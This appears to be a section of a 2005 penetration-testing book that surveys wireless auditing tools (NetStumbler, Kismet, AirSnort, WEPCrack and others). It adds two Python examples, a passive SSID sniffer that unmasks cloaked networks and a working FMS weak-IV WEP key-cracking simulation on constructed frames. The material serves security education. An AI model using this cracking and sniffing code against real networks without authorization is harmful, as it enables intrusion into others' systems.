Tools


You can use several tools when performing penetration tests against wireless networks. This section covers the following tools:

  • NetStumbler

  • StumbVerter

  • DStumbler

  • Kismet

  • GPSMap

  • AiroPeek NX

  • AirSnort

  • WEPCrack

NetStumbler

NetStumbler (http://stumbler.net) is probably the wireless auditing tool most widely used by penetration testers and malicious hackers alike. It runs on Windows and detects 802.11a, 802.11b, and 802.11g networks.

NetStumbler detects wireless networks and shows their signal strength and whether encryption is being used. This is helpful in discovering wireless networks for further penetration testing, detecting overlapping wireless networks from surrounding companies, and detecting unauthorized rogue APs in your organization. Figure 11-1 shows NetStumbler having detected two wireless SSIDs.

Figure 11-1. NetStumbler


NetStumbler is an active scanner. It transmits broadcast probe requests and records the probe responses, which carry the responding AP's SSID, channel, and capabilities. This has a practical consequence: an AP configured not to broadcast its SSID typically ignores broadcast probe requests as well, so NetStumbler generally does not see such "closed" networks, and it also leaves the scanning machine's own transmissions in the air for a wireless IDS to notice. A passive sniffer such as Kismet (covered later in this section) is the tool for those cases.

StumbVerter

StumbVerter (http://www.sonar-security.com) works in conjunction with NetStumbler and Microsoft MapPoint to provide a map of discovered wireless networks. StumbVerter imports the summary files of NetStumbler into Microsoft MapPoint 2004 and creates icons on a map of all discovered APs. This utility is helpful in pinpointing unauthorized rogue APs on your network.

DStumbler

DStumbler (http://www.dachb0den.com) is similar to NetStumbler except that it runs on BSD platforms. It has many of the same options as NetStumbler including GPS support, colored graphs, maximum supported rate detection, and beaconing interval.

Although DStumbler is an interactive, full-screen program (it runs in a terminal rather than in a GUI window, hence the -n option for terminals with limited fonts), it also takes several command-line options:

    usage: dstumbler device [-d] [-osn] [-m int] [-g gps device] [-l logfile]
      -d: run dstumbler without specifying a wireless device
      -o: specify the use of a prism2 card in monitor mode
      -s: disable scan mode on the card, instead do old style stat polling
      -n: use basic ascii characters for limited terminal fonts
      -m: randomly set mac address at specified interval or 0 for startup
      -g: specify gps device to use
      -l: specify logfile to use for realtime logging

Kismet

Kismet (http://www.kismetwireless.net) is a Linux and BSD-based 802.11b wireless sniffer that has the capability to separate sniffed traffic by wireless SSID.

Kismet requires an 802.11b wireless adapter that is capable of entering into RF monitoring mode. After the wireless adapter is in RF monitoring mode, it cannot associate itself with a wireless network. Therefore, when Kismet is running, you do not have access to the wireless network for other purposes and can only detect and sniff traffic on wireless networks.

Unlike NetStumbler, Kismet is a passive scanner: it transmits nothing and builds its network list from the frames it overhears, including the beacons every AP sends even when no clients are present. For an AP configured not to include its SSID in its beacons, Kismet still records that the AP exists (with its BSSID and channel) but learns the network name only when a client probes for or associates with it, because those frames carry the SSID in the clear.
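To make the active-versus-passive distinction concrete, the following added example (not code from the book or from Kismet) shows the passive approach in miniature. It builds a few 802.11 management frames, constructed here rather than captured, parses the management-frame header, the fixed fields, and the SSID information element, and keeps a network table keyed by BSSID. A beacon with a zero-length SSID element is recorded as a cloaked AP (present, but unnamed), and the AP's later probe response to a client fills in the name; the capability field's privacy bit supplies the "encryption in use" column. The MAC addresses and SSIDs are invented; the frame layout follows the 802.11 management-frame format.

```python
"""Passive SSID discovery from 802.11 management frames (the approach Kismet uses).

Added example; the frames below are constructed in build_mgmt(), not captured.
"""
import struct

# Management subtypes (frame control byte 0 = subtype << 4 | type << 2 | version)
BEACON, PROBE_REQ, PROBE_RESP = 0x08, 0x04, 0x05
CAP_PRIVACY = 0x0010          # capability-info bit: WEP (or later) required


def build_mgmt(subtype, src, dst, bssid, ssid):
    """Assemble a minimal management frame (constructed test data, no FCS)."""
    header = bytes([subtype << 4, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    body = b""
    if subtype in (BEACON, PROBE_RESP):
        # fixed fields: 8-byte timestamp, beacon interval (TUs), capability info (ESS + privacy)
        body += struct.pack("<QHH", 0, 100, 0x0001 | CAP_PRIVACY)
    body += bytes([0, len(ssid)]) + ssid      # SSID information element (element ID 0)
    body += bytes([1, 1, 0x82])               # Supported Rates element: 1 Mbps, basic
    return header + body


def parse_mgmt(frame):
    """Return (subtype, src, bssid, privacy, ssid) for a management frame, else None.

    ssid is None when no SSID element is present and '' for a zero-length
    (cloaked) element; privacy is None for subtypes without a capability field.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                 # type 0 = management
        return None
    subtype = fc0 >> 4
    src, bssid = frame[10:16], frame[16:22]   # addr2 = transmitter, addr3 = BSSID
    body = frame[24:]
    privacy = None
    if subtype in (BEACON, PROBE_RESP):
        if len(body) < 12:
            return None
        cap = struct.unpack_from("<H", body, 10)[0]
        privacy = bool(cap & CAP_PRIVACY)
        body = body[12:]
    ssid = None
    pos = 0
    while pos + 2 <= len(body):               # walk the tagged parameters
        eid, elen = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + elen]
        if len(value) < elen:                 # truncated element: stop rather than guess
            break
        if eid == 0:
            ssid = value.decode("utf-8", "replace")
        pos += 2 + elen
    return subtype, src, bssid, privacy, ssid


class PassiveScanner:
    """Builds the network table from overheard frames only; never transmits."""

    def __init__(self):
        self.networks = {}                    # bssid -> dict

    def _entry(self, bssid, privacy):
        return self.networks.setdefault(
            bssid, {"ssid": None, "cloaked": False, "privacy": privacy, "beacons": 0})

    def feed(self, frame):
        parsed = parse_mgmt(frame)
        if parsed is None:
            return
        subtype, src, bssid, privacy, ssid = parsed
        if subtype == BEACON:
            net = self._entry(bssid, privacy)
            net["beacons"] += 1
            net["privacy"] = privacy
            if ssid == "":
                net["cloaked"] = True         # AP is there, but hides its name
            elif ssid:
                net["ssid"] = ssid
        elif subtype == PROBE_RESP and ssid:
            # the AP answers a client's directed probe with its real SSID
            net = self._entry(bssid, privacy)
            net["ssid"] = ssid
            net["privacy"] = privacy
        # PROBE_REQ frames come from clients: they name an SSID but carry no AP
        # BSSID, so nothing definite about a network is learned from them here.


def demo():
    """Feed a constructed exchange and return the table keyed by printable BSSID."""
    ap1, ap2 = bytes.fromhex("000c41aabb01"), bytes.fromhex("000c41aabb02")
    client, bcast = bytes.fromhex("00408c112233"), b"\xff" * 6
    frames = [
        build_mgmt(BEACON, ap1, bcast, ap1, b"corp-net"),
        build_mgmt(BEACON, ap2, bcast, ap2, b""),                 # cloaked beacon
        build_mgmt(PROBE_REQ, client, bcast, bcast, b"hidden-lab"),
        build_mgmt(PROBE_RESP, ap2, client, ap2, b"hidden-lab"),  # name revealed
        b"\x08\x01" + b"\x00" * 22,                                # data frame: ignored
    ]
    scanner = PassiveScanner()
    for f in frames:
        scanner.feed(f)
    return {b.hex(":"): n for b, n in scanner.networks.items()}


if __name__ == "__main__":
    for bssid, net in demo().items():
        print(bssid, net)
```

A real sniffer also records the channel (from the DS Parameter Set element, ID 3), the signal level from the radiotap or Prism header, and client-to-AP data frames, but the table above already reproduces what this section's tools display: BSSID, SSID, whether the SSID is cloaked, and whether encryption is required.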

Figure 11-2 shows a screenshot of Kismet.

Figure 11-2. Kismet


GPSMap

GPSMap is a free program included with Kismet that maps out all APs discovered by Kismet and their respective ranges. By graphing out the ranges of an AP, you can often detect which wireless networks are home-based networks, which often have short ranges, and which are used by organizations, which often have longer ranges.

AiroPeek NX

AiroPeek NX (http://www.wildpackets.com/products/airopeek_nx) is a commercial wireless LAN analysis tool that runs on Windows platforms. AiroPeek captures traffic and provides analysis reports on your wireless LAN. Like NetStumbler, AiroPeek discovers wireless SSIDs, their channel number, the MAC address of the AP, and whether encryption is being used. AiroPeek goes beyond NetStumbler, however, in its capability to capture traffic and, through its Peer Map view, to graph the amount and type of traffic present on a wireless network.

AiroPeek NX is an excellent solution for penetration testers because of its security audit features. It allows you to define a template to look for certain criteria, such as unauthorized protocols or rogue APs, during a security audit. It is also popular among penetration testers for its reporting features that are not typically found among non-commercial open-source equivalents.

AirSnort

As discussed earlier, many companies seek to secure their wireless networks through the use of WEP. However, WEP encrypts each packet with RC4 keyed by a 24-bit initialization vector (IV) prepended to the shared secret key. The IV is sent in the clear with every packet, the IV space is small enough that keystreams are reused, and a class of "weak" IVs leaks bytes of the secret key through the first byte of RC4 output. Once enough packets have been gathered, the key is easily recovered.

AirSnort (http://airsnort.shmoo.com) is a Linux utility that can crack WEP keys. This tool requires your wireless adapter to be in RF monitoring mode. It passively captures packets, keeps those carrying weak IVs, and then attempts to recover the key from them. With 5 to 10 million packets captured, AirSnort can usually recover the WEP key in less than a second.
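The following added example (not code from the book, from AirSnort, or from WEPCrack) simulates the weak-IV attack that both of those tools automate. It constructs a 40-bit key and a "capture" of frames sent under the classic weak IVs (A, 255, X), recovers the key one byte at a time by voting on the first keystream byte (known to the attacker because every 802.11 data frame starts with the LLC/SNAP byte 0xAA), keeps the top few candidates per byte, and confirms a full candidate key against the CRC-32 integrity check value (ICV) of one frame. The key, the plaintext and the IV sequence are assumptions for the simulation; a real card spreads weak IVs thinly across the 2^24 IV space, which is why millions of frames are needed in practice.

```python
"""Simulation of the FMS weak-IV attack on WEP.

Added example, not code from the book or from AirSnort/WEPCrack. The capture is
constructed below: an assumed 40-bit key, 1280 frames under weak IVs (A, 255, X),
and a fixed plaintext whose first byte is the LLC/SNAP 0xAA.
"""
import zlib

SNAP_FIRST_BYTE = 0xAA        # first plaintext byte of every 802.11 data frame
TOP_CANDIDATES = 3            # backtracking width per key byte


def rc4_ksa(key, steps=256):
    """RC4 key scheduling. steps < 256 returns the partial state FMS reasons about."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, secret, plaintext):
    """WEP: per-packet RC4 key = IV || secret; ICV = CRC-32 of the plaintext."""
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + secret, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt_ok(iv, secret, ciphertext):
    """Decrypt with a candidate key and check the ICV (the attacker's verifier)."""
    ks = rc4_keystream(iv + secret, len(ciphertext))
    data = bytes(a ^ b for a, b in zip(ciphertext, ks))
    return zlib.crc32(data[:-4]).to_bytes(4, "little") == data[-4:]


def fms_guess(iv, z, known):
    """FMS: run the first A = 3 + len(known) KSA steps with the IV and the
    already-recovered secret bytes. If the state is 'resolved' (S[1] < A and
    S[1] + S[S[1]] == A), the first keystream byte z equals S[j'] for the next
    step's j' with probability about 5%, giving K[A] = S^-1[z] - j - S[A] (mod 256).
    Returns that candidate, or None if the IV is not resolved."""
    A = 3 + len(known)
    S, j = rc4_ksa(bytes(iv) + bytes(known), steps=A)
    x = S[1]
    if x >= A or (x + S[x]) & 0xFF != A:
        return None
    return (S.index(z) - j - S[A]) & 0xFF


def crack_wep(frames, key_len):
    """frames: list of (iv, ciphertext). Vote byte by byte, keep the top candidates,
    and verify a complete key against one frame's ICV; backtracking covers the
    occasional byte whose correct value is not the top vote."""
    samples = [(iv, ct[0] ^ SNAP_FIRST_BYTE) for iv, ct in frames]

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            iv, ct = frames[0]
            return key if wep_decrypt_ok(iv, key, ct) else None
        votes = [0] * 256
        for iv, z in samples:
            g = fms_guess(iv, z, known)
            if g is not None:
                votes[g] += 1
        for cand in sorted(range(256), key=lambda b: -votes[b])[:TOP_CANDIDATES]:
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


# --- constructed capture (assumed key and plaintext, not a real sniff) ---------
SECRET = bytes.fromhex("0badc0ffee")
PLAINTEXT = bytes.fromhex("aaaa030000000800") + b"constructed IP payload"


def build_capture(secret):
    """Frames a station would emit if its card walked through the weak IVs (A, 255, X)."""
    frames = []
    for a in range(3, 3 + len(secret)):
        for x in range(256):
            iv = bytes([a, 255, x])
            frames.append((iv, wep_encrypt(iv, secret, PLAINTEXT)))
    return frames


def demo():
    return crack_wep(build_capture(SECRET), len(SECRET))


if __name__ == "__main__":
    print("recovered key:", demo().hex())
```

The same code recovers a 104-bit key by extending the IV classes to A = 3..15; the only change in the field is the capture size, since a card that picks IVs sequentially or at random yields roughly one useful weak IV per 65,536 frames for each key byte.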

WEPCrack

WEPCrack (http://wepcrack.sourceforge.net) is similar to AirSnort in that it cracks WEP keys. WEPCrack has been around longer than AirSnort but is not as popular. WEPCrack is a Perl-based cracking program that requires a wireless adapter with the Prism chipset.



    Penetration Testing and Network Defense
    ISBN: 1587052083
    Year: 2005